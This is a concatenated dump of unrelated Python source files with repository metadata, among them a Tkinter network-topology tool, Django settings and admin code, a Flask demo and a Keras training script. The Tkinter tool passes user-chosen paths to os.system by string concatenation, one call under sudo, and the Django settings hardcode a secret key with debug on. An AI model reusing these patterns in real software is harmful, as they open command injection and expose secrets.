print "python loadDB.py "+self.directory+" "+self.baseName.get() +" "+ self.algorithm[self.L3.curselection()[0]]
os.system("python loadDB.py "+self.directory+" "+self.baseName.get() +" "+ self.algorithm[self.L3.curselection()[0]])
self.root.destroy()
self.labelVariable.set(" Topology Tools v1.0")
else:
print "WARNING: Falto completar un campo"
#####################BOTON B4#########################
def OnButtonClickB4(self):
self.labelVariable.set("Borrar archivos temporales generados por tcpdump" )
self.directory = tkFileDialog.askdirectory(parent=self,title='Seleccione la ubicacion de la carpeta mininext')
if self.directory != "":
print "Borrando archivos temporales de la carpeta "+ self.directory
os.system("python deleteTemporaryFiles.py "+self.directory)
self.labelVariable.set(" Topology Tools v1.0")
#####################BOTON B5#########################
def OnButtonClickB5(self):
self.labelVariable.set("Empezar emulación con MiniNExt" )
self.directory = tkFileDialog.askdirectory(parent=self,title='Seleccione la ubicacion de la carpeta generada')
if self.directory != "":
print "Running sudo python "+ self.directory + "/start.py"
os.system("sudo python "+ self.directory + "/start.py")
#####################BOTON B6#########################
def OnButtonClickB6(self):
self.labelVariable.set("Descargar Trazas BGP desde www.ripe.net" )
self.directory = tkFileDialog.askdirectory(parent=self,title='Seleccione la ubicacion donde descargar la traza')
if self.directory != "":
self.root = Tkinter.Tk()
self.root.eval('tk::PlaceWindow %s center' % self.root.winfo_pathname(self.root.winfo_id()))
self.root.title("TRAZA BGP")
Tkinter.Label(self.root, height=2,width=40,font=('arial', 11, 'bold'), text="Seleccione el origen de la traza").pack()
self.opM = ttk.Combobox(self.root, width=10, values=[ "rrc00" ,"rrc01", "rrc02", "rrc03","rrc04","rrc05","rrc06","rrc07","rrc08","rrc09","rrc10","rrc11","rrc12","rrc13","rrc14","rrc15","rrc16"])
self.opM.current(0)
self.opM.pack()
Tkinter.Label(self.root, height=2,width=40,font=('arial', 11, 'bold'), text="Seleccione el día").pack()
self.calendar = ttkcalendar.Calendar(self.root)
self.calendar.pack()
Tkinter.Label(self.root, height=2,width=40,font=('arial', 11, 'bold'), text="Seleccione la hora").pack()
lstHours=[]
cont=0;
for i in range(0,24):
for j in range(0,12):
if (j <= 1):
valor=str(0)+str(j*5)
else:
valor=str(j*5)
valor=str(i)+":"+valor
if (i <= 9):
valor=str(0)+valor
lstHours.insert(cont,valor)
cont+=1
Tkinter.Label(self.root, height=2,width=40,font=('arial', 11), text="Hora Inicio").pack()
self.opHourMin = ttk.Combobox(self.root, width=5,values=lstHours)
self.opHourMin.current(0)
self.opHourMin.pack()
Tkinter.Label(self.root, height=2,width=40,font=('arial', 11), text="Hora Fin").pack()
self.opHourMax = ttk.Combobox(self.root, width=5,values=lstHours)
self.opHourMax.current(0)
self.opHourMax.pack()
buttonCalendar = Tkinter.Button(self.root, text="Aceptar", command=self.onClickCalendar).pack(side=Tkinter.RIGHT)
buttonCancel = Tkinter.Button(self.root, text="Cancelar", command=self.root.destroy).pack(side=Tkinter.LEFT)
def onClickCalendar(self):
date= str(self.calendar.selection).split(" ")[0]
#Ej: python downloadFromRipe.py rrc00 2014-02-15 16:45 17:10 /home/
print "python downloadFromRipe.py "+self.opM.get()+" "+date+" "+self.opHourMin.get()+" "+self.opHourMax.get()+" "+self.directory
os.system("python downloadFromRipe.py "+self.opM.get()+" "+date+" "+self.opHourMin.get()+" "+self.opHourMax.get()+" "+self.directory)
self.root.eval('::ttk::CancelRepeat')
self.root.destroy()
self.labelVariable.set(" Topology Tools v1.0")
if __name__ == "__main__":
app = simpleapp_tk(None)
app.title('Topology Tools')
app.mainloop()
|
[
"noreply@github.com"
] |
cuchy.noreply@github.com
|
54b3d5db7d4193b1ac06c3eb01d62a626a47d055
|
118217dbc4d2e78f9fdf54fb652309708effa673
|
/app/app/settings.py
|
a444feed928e83d5a84443c4e23b4910660ea23e
|
[
"MIT"
] |
permissive
|
Mimicx/recipe-app-api
|
68f1d40aee64212823ff5e91a3fa3cd6e51b459f
|
4aa0ad098d414861b628e50948b741dc56a5847a
|
refs/heads/master
| 2020-12-04T15:01:06.894710
| 2020-04-27T08:10:32
| 2020-04-27T08:10:32
| 231,809,804
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,241
|
py
|
"""
Django settings for app project.
Generated by 'django-admin startproject' using Django 2.1.15.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '(d3+ugse4m4p-(h2jy5eh#&w*++fj*1^^ifrf6j8yr4gm5i#j#'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'core',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'app.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'app.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'HOST': os.environ.get('DB_HOST'),
'NAME': os.environ.get('DB_NAME'),
'USER': os.environ.get('DB_USER'),
'PASSWORD': os.environ.get('DB_PASS')
}
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
AUTH_USER_MODEL = 'core.User'
|
[
"mimic@MacBook-Pro-de-Mimic.local"
] |
mimic@MacBook-Pro-de-Mimic.local
|
7ef805e48e0b8adaf86af6ff894ad57d90a8dabe
|
334e7e8b9162cd74e1c9dd115a6e293f01051454
|
/src/profiles/admin.py
|
2ded111a3ce3a2b08cab6f2e78f67dd609b0352c
|
[
"MIT"
] |
permissive
|
contactr2m/remote_repo
|
dec0dff9c299ab665cd36642a757ae9fa35950c3
|
5665c55b794929fd40645264c5c149e64d172097
|
refs/heads/master
| 2021-01-10T13:13:47.359357
| 2016-04-26T14:23:49
| 2016-04-26T14:23:49
| 53,814,820
| 0
| 0
| null | 2016-03-20T19:37:37
| 2016-03-14T00:13:06
|
Python
|
UTF-8
|
Python
| false
| false
| 1,084
|
py
|
from __future__ import unicode_literals
from django.contrib import admin
#from authtools.admin import NamedUserAdmin
from .models import Profile
from django.contrib.auth import get_user_model
from django.core.urlresolvers import reverse
from accounts.admin import EmailUserAdmin
User = get_user_model()
class UserProfileInline(admin.StackedInline):
model = Profile
class NewUserAdmin(EmailUserAdmin):
inlines = [UserProfileInline]
list_display = ('is_active', 'email', 'first_name', 'last_name', 'display_name', 'permalink',
'is_superuser', 'is_staff',)
# 'View on site' didn't work since the original User model needs to
# have get_absolute_url defined. So showing on the list display
# was a workaround.
def permalink(self, obj):
url = reverse("profiles:show",
kwargs={"slug": obj.profile.slug})
# Unicode hex b6 is the Pilcrow sign
return '<a href="{}">{}</a>'.format(url, '\xb6')
permalink.allow_tags = True
admin.site.unregister(User)
admin.site.register(User, NewUserAdmin)
|
[
"contactr2m@gmail.com"
] |
contactr2m@gmail.com
|
c77fc7c74aee8e33dbb0111a5d71f763ecb0cb21
|
b0015342f71f027a63630b0e3d76c8b1a24088a2
|
/srnet/utils/__init__.py
|
f498b8ecabd11961a34814af7e37aa1f1b32a691
|
[] |
no_license
|
sean-rice/srnet
|
476804f1f20d2e2b9d124e849cc6804e2b5ea878
|
6cf1b0232c081e1e8e02073402cd4f6910100255
|
refs/heads/master
| 2023-09-05T01:36:21.727479
| 2021-05-24T22:33:22
| 2021-05-24T22:33:22
| 283,088,184
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 59
|
py
|
from . import _utils, image, image_list, patchable_wrapper
|
[
"contact@sean.ee"
] |
contact@sean.ee
|
ec639ec794b8162d801d6bc692154bb82195da7c
|
5294915919042b56505a01ed64b579a2c3788647
|
/DS_SJE_utils.py
|
f4526d5a19652cf71e6686319c002428521a39dd
|
[] |
no_license
|
JinHyeopLee/DS_SJE_tensorflow
|
bd67a6765015b3602f13ce0dd5220835f4523239
|
06f17e822bee1bddfa58fa91fc91305462d1078d
|
refs/heads/master
| 2020-04-07T07:04:52.643075
| 2018-12-05T15:05:03
| 2018-12-05T15:05:03
| 158,162,731
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 598
|
py
|
import numpy as np
def append_nparr(arr1, arr2, axis=0):
if arr1 is None:
arr1 = arr2
else:
arr1 = np.append(arr1, arr2, axis=axis)
return arr1
def random_select(class_num, num_entity_each_class):
random_offset = np.random.randint(0, num_entity_each_class[class_num])
class_base_num = 0
for i in range(len(num_entity_each_class)):
if i == class_num:
break
class_base_num += num_entity_each_class[i]
return class_base_num + random_offset
# def int_to_float(tuple):
# return tuple[0], np.float32(tuple[1]), tuple[2]
|
[
"jhlee7467@gmail.com"
] |
jhlee7467@gmail.com
|
e2f166eb27eec77732a009850684325baf47550c
|
148f5fb80cb7640dbd4419617f1f002cd6b641bf
|
/MP4-HadoopMapReduce/TopTitleStatisticsMapper.py
|
43f9404508a4053c503e19c3962ab525dd6dd767
|
[] |
no_license
|
nhtrinh2/Cloud-Computing-and-Big-Data
|
7e6ec7811f42188ed181bb72b3be7768f7546480
|
c51e48e96660d7ed67f9812017124d30453a6f0a
|
refs/heads/master
| 2023-03-17T02:57:58.801203
| 2020-04-19T19:21:57
| 2020-04-19T19:21:57
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 172
|
py
|
#!/usr/bin/env python3
import sys
for line in sys.stdin:
word, value = line.strip().split('\t')
print('%s\t%s' % ('count', value)) # pass this output to reducer
|
[
"hongfeili365@gmail.com"
] |
hongfeili365@gmail.com
|
3fa5adf81091340c3211190e48597e99715da11a
|
0723805aecf730d6762456651430ac222b5548b2
|
/codechef/MARCH13_TOTR.py
|
5e1cc0bae539be9ab3f3c7829ad028d2f7aeb10a
|
[] |
no_license
|
nemausus/topcoder
|
4979ba2b626cd23423891b5e126a30dbfc47960f
|
946bccc7847a6ac3177a5a7bb70917980a2912ee
|
refs/heads/master
| 2020-12-29T02:40:15.540203
| 2017-06-09T06:01:38
| 2017-07-07T21:45:21
| 7,567,126
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 619
|
py
|
// https://www.codechef.com/MARCH13/status/TOTR,nemausus
// https://www.codechef.com/viewplaintext/1890676
import string
a,b = raw_input().split()
t = int(a)
translation = str(b)
dictionary = {'_':' '}
allTheLetters = string.lowercase
for i in range(26):
dictionary[allTheLetters[i]] = translation[i]
dictionary[allTheLetters[i].upper()] = translation[i].upper()
for i in range(t):
inp = list(str(raw_input()))
length = len(inp)
for i in range(length):
try:
inp[i] = dictionary[inp[i]]
except KeyError:
dictionary[inp[i]] = inp[i]
print "".join(inp)
|
[
"naresh.kumar@thoughtspot.com"
] |
naresh.kumar@thoughtspot.com
|
973d2f5af01158d20e8d8e0401dd4a38bffe70c1
|
a4fd8c01606641424faca66cae651b2670a863d7
|
/postfinancecheckout/models/customers_presence.py
|
904e7a50b40d1e730de795f474b2417c870457c4
|
[
"Apache-2.0"
] |
permissive
|
pfpayments/python-sdk
|
c435a4519a5a95a46cb6e446a4a8c83aeb9dcc2d
|
2d6b1429f5a4cafe61dcf5ea2c2a698848a837e0
|
refs/heads/master
| 2023-08-07T17:05:20.864000
| 2023-07-20T14:41:34
| 2023-07-20T14:41:34
| 251,532,627
| 2
| 0
|
Apache-2.0
| 2022-10-26T08:40:23
| 2020-03-31T07:38:00
|
Python
|
UTF-8
|
Python
| false
| false
| 207
|
py
|
# coding: utf-8
from enum import Enum, unique
@unique
class CustomersPresence(Enum):
NOT_PRESENT = "NOT_PRESENT"
VIRTUAL_PRESENT = "VIRTUAL_PRESENT"
PHYSICAL_PRESENT = "PHYSICAL_PRESENT"
|
[
"thomas.hunziker@customweb.com"
] |
thomas.hunziker@customweb.com
|
e5ace796de9aa6a3eed2fe626a7ccff896fcd712
|
c73f43dde251d83cf889f0d056559e601fe134e2
|
/test/baike_spider/url_manager.py
|
511a948ae3cbfa4bc8c2ef308da751d598b27ead
|
[] |
no_license
|
zhangyang183487/awesome-python3-webapp
|
bedd2bd2689abb130720afcfbd80f1a7adcab4c7
|
96e8e02a6fdb75a57a92259ad2c78c3593ef535a
|
refs/heads/master
| 2020-04-28T21:27:49.228349
| 2019-06-19T07:56:02
| 2019-06-19T07:56:02
| 175,582,604
| 0
| 0
| null | 2019-06-19T07:56:03
| 2019-03-14T08:46:26
|
Python
|
UTF-8
|
Python
| false
| false
| 867
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
class UrlManager(object):
def __init__(self):
self.new_urls = set()
self.old_urls = set()
# 添加新url
def add_new_url(self, url):
if url is None:
return
if url not in self.new_urls and url not in self.old_urls:
self.new_urls.add(url)
# 理论添加url
def add_new_urls(self, urls):
if urls is None or len(urls) == 0:
return
for url in urls:
if url not in self.new_urls and url not in self.old_urls:
self.new_urls.add(url)
# 是否还有未执行过的url
def has_new_url(self):
return len(self.new_urls) > 0
# 获取一个新的url
def get_new_url(self):
new_url = self.new_urls.pop();
self.old_urls.add(new_url)
return new_url
|
[
"zhangyang183487@hollysys.com"
] |
zhangyang183487@hollysys.com
|
d1f9c5d8fe6a52dd2e130204f45e94850dfa5e0f
|
33f86c1678d2f5e15da77885e0bf770f405201a4
|
/tcamp/local_settings.example.py
|
b5b48f86971536c25ec25d5c61d13c2805a1304e
|
[
"BSD-3-Clause"
] |
permissive
|
imclab/tcamp
|
5410c9549ed7731575e7312acfed7b8e4cd0c58d
|
111cabab90b2c8cf651ee480520bc43a33f30844
|
refs/heads/master
| 2021-01-18T12:15:58.484183
| 2014-03-05T21:36:00
| 2014-03-05T21:36:06
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,832
|
py
|
DEBUG = True
ADMINS = (
('', ''),
)
MANAGERS = ADMINS
INTERNAL_IPS = ('127.0.0.1', )
SECRET_KEY = ''
DATABASES = {
'local': {
'ENGINE': '', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': '', # Or path to database file if using sqlite3.
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
},
'staging': {
'ENGINE': '', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': '', # Or path to database file if using sqlite3.
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
},
'production': {
'ENGINE': '', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': '', # Or path to database file if using sqlite3.
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
DATABASES['default'] = DATABASES['local']
FAVICON = ''
APPLE_TOUCH_ICON = ''
SHARING_IMAGE = ''
FB_APP_ID = ''
GOOGLE_ANALYTICS_ID = ''
AWS_ACCESS_KEY_ID = ''
AWS_SECRET_ACCESS_KEY = ''
ASSET_SITE_VERSION = '1.0'
COMPRESS_URL = ''
COMPRESS_STORAGE = ''
STATICFILES_STORAGE = COMPRESS_STORAGE
STATIC_URL = COMPRESS_URL
POSTMARK_API_KEY = ''
POSTMARK_SENDER = ''
GOOGLEAUTH_DOMAIN = ''
GOOGLEAUTH_REALM = ''
TWITTER_CONSUMER_KEY = ''
TWITTER_CONSUMER_SECRET = ''
FACEBOOK_APP_ID = ''
FACEBOOK_API_SECRET = ''
GOOGLE_OAUTH2_CLIENT_ID = ''
GOOGLE_OAUTH2_CLIENT_SECRET = ''
GITHUB_APP_ID = ''
GITHUB_API_SECRET = ''
DISQUS_CLIENT_ID = ''
DISQUS_CLIENT_SECRET = ''
AKISMET_KEY = ''
TWITTER_CONSUMER_KEY = ''
TWITTER_CONSUMER_SECRET = ''
TWITTER_ACCESS_KEY = ''
TWITTER_ACCESS_SECRET = ''
DISQUS_SHORTNAME = ''
BRAINSTORM_USE_DISQUS = True
BRAINSTORM_LOGIN_OPTIONS = (
('Twitter', '/login/twitter/'),
('Facebook', '/login/facebook/'),
('Google', '/login/google-oauth2/'),
('Github', '/login/github/'),
)
VARNISH_MANAGEMENT_ADDRS = ()
TWILIO_ACCOUNT_SID = ''
TWILIO_AUTH_TOKEN = ''
RAVEN_CONFIG = {
'dsn': '',
}
|
[
"dan.drinkard@gmail.com"
] |
dan.drinkard@gmail.com
|
26788b2b41f458fe7a22cf558196deec2b03846b
|
8a870098382dce7bf59ed046908ed369e5045662
|
/Problem_Solving/Algorithms/Implementation/8_Migratory_Birds/Solution.py
|
0a2caf5509caf83a3adb2d89c9229e6dfabb8d49
|
[
"MIT"
] |
permissive
|
CFLSousa/HackerRank
|
794318b3c4903f9f625848dfcd00d7d52b0bf748
|
29ed039634e88d72981b2ecd619e5c65d37111e4
|
refs/heads/master
| 2021-08-17T10:31:54.739339
| 2020-04-13T16:11:36
| 2020-04-13T16:11:36
| 159,576,300
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 692
|
py
|
import math
import os
import random
import re
import sys
def migratoryBirds(arr):
countersLen=5
maxCounter=0
maxCounterIndex=0
counters=[0 for x in range(countersLen)]
for k,birdType in enumerate(arr):
counters[birdType-1]+=1
for index,counterVal in enumerate(counters):
if counterVal>maxCounter:
maxCounter=counterVal
maxCounterIndex=index
return maxCounterIndex+1
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
arr_count = int(input().strip())
arr = list(map(int, input().rstrip().split()))
result = migratoryBirds(arr)
fptr.write(str(result) + '\n')
fptr.close()
|
[
"zizo2@sapo.pt"
] |
zizo2@sapo.pt
|
3dcaa933be418416fe87dd55f3819f52ea48c329
|
4460086c7817c8f952d9f532cbbc01770a8f7d83
|
/hello.py
|
103ce431c728a675fd31464b1e1075071aeab4b4
|
[
"MIT"
] |
permissive
|
qianjing2020/twitoff
|
d3c926f153513a83df728aa8722412ef14856070
|
a223e8f4a3dfecd582c18c92f8ac9212a01d4570
|
refs/heads/main
| 2023-04-17T05:39:41.990743
| 2021-05-02T02:52:04
| 2021-05-02T02:52:04
| 311,975,367
| 0
| 0
|
MIT
| 2020-11-28T03:25:16
| 2020-11-11T13:14:38
| null |
UTF-8
|
Python
| false
| false
| 228
|
py
|
# hello.py
from flask import Flask
app = Flask(__name__)
# print(__name__)
# print(type(app))
@app.route("/")
def index():
x = 2 + 2
return f"Hello World! {x}"
@app.route("/about")
def about():
return "About me"
|
[
"qianjing2020@users.noreply.github.com"
] |
qianjing2020@users.noreply.github.com
|
f9ff82f3afadebdc0f2fa82b4a0f19227d7cf918
|
67a10f3384d5048bbc0e46c0535b0c113d78c2fa
|
/examples/implicit_orientation_learning/train.py
|
0e435a1228d1816889983ad832d23c56eaed8537
|
[
"MIT"
] |
permissive
|
DeepanChakravarthiPadmanabhan/fer
|
af9bc6b65bf6d265c63d107b0f11ab0c09002390
|
920268633aa0643416551212ec2d70f3591b5001
|
refs/heads/master
| 2023-09-05T03:04:50.468845
| 2021-11-09T23:42:54
| 2021-11-09T23:42:54
| 426,337,368
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,135
|
py
|
import os
import glob
import json
import argparse
from tensorflow.keras.callbacks import EarlyStopping, ReduceLROnPlateau
from tensorflow.keras.callbacks import CSVLogger, ModelCheckpoint
from tensorflow.keras.optimizers import Adam
from paz.backend.image import write_image
from paz.abstract import GeneratingSequence
from paz.optimization.callbacks import DrawInferences
from paz.pipelines import AutoEncoderPredictor
from scenes import SingleView
from pipelines import DomainRandomization
from model import AutoEncoder
description = 'Training script for learning implicit orientation vector'
root_path = os.path.join(os.path.expanduser('~'), '.keras/paz/')
parser = argparse.ArgumentParser(description=description)
parser.add_argument('-op', '--obj_path', type=str, help='Path of 3D OBJ model',
default=os.path.join(
root_path,
'datasets/ycb/models/035_power_drill/textured.obj'))
parser.add_argument('-cl', '--class_name', default='035_power_drill', type=str,
help='Class name to be added to model save path')
parser.add_argument('-id', '--images_directory', type=str,
help='Path to directory containing background images',
default=os.path.join(
root_path, 'datasets/voc-backgrounds/'))
parser.add_argument('-bs', '--batch_size', default=32, type=int,
help='Batch size for training')
parser.add_argument('-lr', '--learning_rate', default=0.001, type=float,
help='Initial learning rate for Adam')
parser.add_argument('-is', '--latent_dimension', default=128, type=int,
help='Latent dimension of the auto-encoder')
parser.add_argument('-ld', '--image_size', default=128, type=int,
help='Size of the side of a square image e.g. 64')
parser.add_argument('-sp', '--stop_patience', default=7, type=int,
help='Number of epochs before doing early stopping')
parser.add_argument('-pp', '--plateau_patience', default=3, type=int,
help='Number of epochs before reducing learning rate')
parser.add_argument('-e', '--max_num_epochs', default=10000, type=int,
help='Maximum number of epochs before finishing')
parser.add_argument('-st', '--steps_per_epoch', default=1000, type=int,
help='Steps per epoch')
parser.add_argument('-sh', '--top_only', default=0, choices=[0, 1], type=int,
help='Flag for full sphere or top half for rendering')
parser.add_argument('-ls', '--loss', default='binary_crossentropy', type=str,
help='tf.keras loss function name to be used')
parser.add_argument('-r', '--roll', default=3.14159, type=float,
help='Threshold for camera roll in radians')
parser.add_argument('-s', '--shift', default=0.05, type=float,
help='Threshold of random shift of camera')
parser.add_argument('-d', '--depth', nargs='+', type=float,
default=[0.3, 0.5],
help='Distance from camera to origin in meters')
parser.add_argument('-fv', '--y_fov', default=3.14159 / 4.0, type=float,
help='Field of view angle in radians')
parser.add_argument('-l', '--light', nargs='+', type=float,
default=[.5, 30],
help='Light intensity from poseur')
parser.add_argument('-oc', '--num_occlusions', default=2, type=int,
help='Number of occlusions')
parser.add_argument('-sa', '--save_path',
default=os.path.join(
os.path.expanduser('~'), '.keras/paz/models'),
type=str, help='Path for writing model weights and logs')
args = parser.parse_args()
# setting optimizer and compiling model
latent_dimension = args.latent_dimension
model = AutoEncoder((args.image_size, args.image_size, 3), latent_dimension)
optimizer = Adam(args.learning_rate, amsgrad=True)
model.compile(optimizer, args.loss, metrics=['mse'])
model.summary()
# setting scene
renderer = SingleView(args.obj_path, (args.image_size, args.image_size),
args.y_fov, args.depth, args.light, bool(args.top_only),
args.roll, args.shift)
# creating sequencer
image_paths = glob.glob(os.path.join(args.images_directory, '*.png'))
processor = DomainRandomization(
renderer, args.image_size, image_paths, args.num_occlusions)
sequence = GeneratingSequence(processor, args.batch_size, args.steps_per_epoch)
# making directory for saving model weights and logs
model_name = '_'.join([model.name, str(latent_dimension), args.class_name])
save_path = os.path.join(args.save_path, model_name)
if not os.path.exists(save_path):
os.makedirs(save_path)
# setting callbacks
log = CSVLogger(os.path.join(save_path, '%s.log' % model_name))
stop = EarlyStopping('loss', patience=args.stop_patience, verbose=1)
plateau = ReduceLROnPlateau('loss', patience=args.plateau_patience, verbose=1)
model_path = os.path.join(save_path, '%s_weights.hdf5' % model_name)
save = ModelCheckpoint(
model_path, 'loss', verbose=1, save_best_only=True, save_weights_only=True)
# setting drawing callbacks
images = (sequence.__getitem__(0)[0]['input_image'] * 255).astype('uint8')
for arg, image in enumerate(images):
image_name = 'image_%03d.png' % arg
image_path = os.path.join(save_path, 'original_images/' + image_name)
write_image(image_path, image)
inferencer = AutoEncoderPredictor(model)
draw = DrawInferences(save_path, images, inferencer)
# saving hyper-parameters and model summary as text files
print(save_path)
with open(os.path.join(save_path, 'hyperparameters.json'), 'w') as filer:
json.dump(args.__dict__, filer, indent=4)
with open(os.path.join(save_path, 'model_summary.txt'), 'w') as filer:
model.summary(print_fn=lambda x: filer.write(x + '\n'))
# model optimization
model.fit_generator(
sequence,
steps_per_epoch=args.steps_per_epoch,
epochs=args.max_num_epochs,
callbacks=[stop, log, save, plateau, draw],
verbose=1,
workers=0)
|
[
"deepangrad@gmail.com"
] |
deepangrad@gmail.com
|
4b2654ba6bffd9e20cf44a960e8ed5166476ba81
|
749aca95edfaad9e7d8b84dc2c6f62038595efc3
|
/mandala.py
|
dac1d0eae959c6a652cc1f391088ca60e9419b56
|
[] |
no_license
|
xmduhan/mandala
|
efe72b116ec829457cd2286b88b4544d5538861c
|
eafea6c9ebd0ca913c070f0bf2cbf72a6566b0a7
|
refs/heads/master
| 2021-06-30T16:30:49.410637
| 2017-09-20T09:44:53
| 2017-09-20T09:44:53
| 104,153,412
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,494
|
py
|
#!/usr/bin/env python
# encoding: utf-8
import dataset
from pyfiglet import Figlet
from termcolor import cprint
from prompt_toolkit import prompt as _prompt
from prompt_toolkit.history import InMemoryHistory
from itertools import count
from treelib import Tree
from pandas import DataFrame
history = InMemoryHistory()
db = dataset.connect('sqlite:///db.sqlite')
table = db['relation']
db.begin()
def commit():
""" """
db.commit()
db.begin()
print u'保存成功!'
def rollback():
""" """
db.rollback()
db.begin()
print u'操作撤销'
def save(w0, w1):
""" """
table.insert({'w0': w0, 'w1': w1})
# print u'%s --> %s: ' % (w0, w1)
cprint(' |-- ', 'green', end='')
cprint('%s --> %s: ' % (w0, w1), color='blue', end='')
cprint('+1', 'red')
def prompt(text):
return _prompt(text, history=history).strip()
def star(w0=None):
""" """
if w0 is None:
w0 = prompt(u'关键词:')
if len(w0) == 0:
return
for i in count(start=1, step=1):
w1 = prompt(u'%s --> (%d):' % (w0, i))
if len(w1) == 0:
break
save(w0, w1)
def chain(w0=None):
""" """
if w0 is None:
w0 = prompt(u'关键词:')
if len(w0) == 0:
return
for i in count(start=1, step=1):
w1 = prompt(u'%s --> (%d):' % (w0, i))
if len(w1) == 0:
break
save(w0, w1)
w0 = w1
def readLevel():
while True:
levelString = prompt(u'最大递归级数(3):')
if len(levelString) == 0:
levelString = 3
try:
level = int(levelString)
return level
except Exception:
print u'输入有误, 必须是整数!'
def lookup():
""" """
w0 = prompt(u'关键字:')
level = readLevel()
qs = db.query('select w0, w1, count(*) n from relation group by w0, w1')
df = DataFrame(list(qs))
tree = Tree()
tree.create_node(w0, w0)
appendList = []
def append(w0, level=5):
if w0 in appendList or level == 0:
return
appendList.append(w0)
for i, row in df[df['w0'] == w0].iterrows():
w1 = row['w1']
n = row['n']
# print w0, '-->', w1
if w1 not in tree:
title = '%s[%d]' % (w1, n)
tree.create_node(title, w1, parent=w0)
else:
# 出现循环
title = '%s[%d](*)' % (w1, n)
tree.create_node(title, i, parent=w0)
append(w1, level - 1)
append(w0, level)
tree.show()
def quit():
""" """
print u'再见!'
db.rollback()
exit()
def help():
""" """
print u'star: 星型添加'
print u'chain: 链式添加'
print u'commit: 保存'
print u'rollback: 取消'
print u'lookup: 查找'
print u'quit: 退出'
print u'help: 帮助'
commands = {
'star': star,
'chain': chain,
'lookup': lookup,
'commit': commit,
'rollback': rollback,
'quit': quit,
'help': help,
}
def main():
""" """
# 打印logo
f = Figlet(font='slant')
print f.renderText('Mandala')
# 读取并执行命令
try:
while True:
cmd = prompt(u'mandala>')
if cmd in commands:
commands[cmd]()
else:
print u'无效命令'
except KeyboardInterrupt:
quit()
if __name__ == "__main__":
main()
|
[
"xmduhan@gmail.com"
] |
xmduhan@gmail.com
|
27ddd3555fa9a367607271950e9516a2c79efd64
|
0ae54260b86968dbb2748496629775d03732359c
|
/controller/action.py
|
60f11dd52f310b7f7d927cc3bf4d6fec2c0278ad
|
[
"MIT"
] |
permissive
|
sosterwalder/bti7501p
|
f9593bdf440af25cd40c7f3347e973dd77a0c6b2
|
6da28ac4f6c63205a2b6e8708b01c65fda6c3ce5
|
refs/heads/master
| 2021-01-10T19:56:54.759971
| 2014-06-13T21:28:00
| 2014-06-13T21:28:00
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,647
|
py
|
#!/usr/bin/env python
# action.py module
#
# The MIT License (MIT)
#
# Copyright (c) 2014 Thi Thuy-Duc Dao (daodt1@bfh.ch), Sven Osterwalder (ostes2@bfh.ch)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
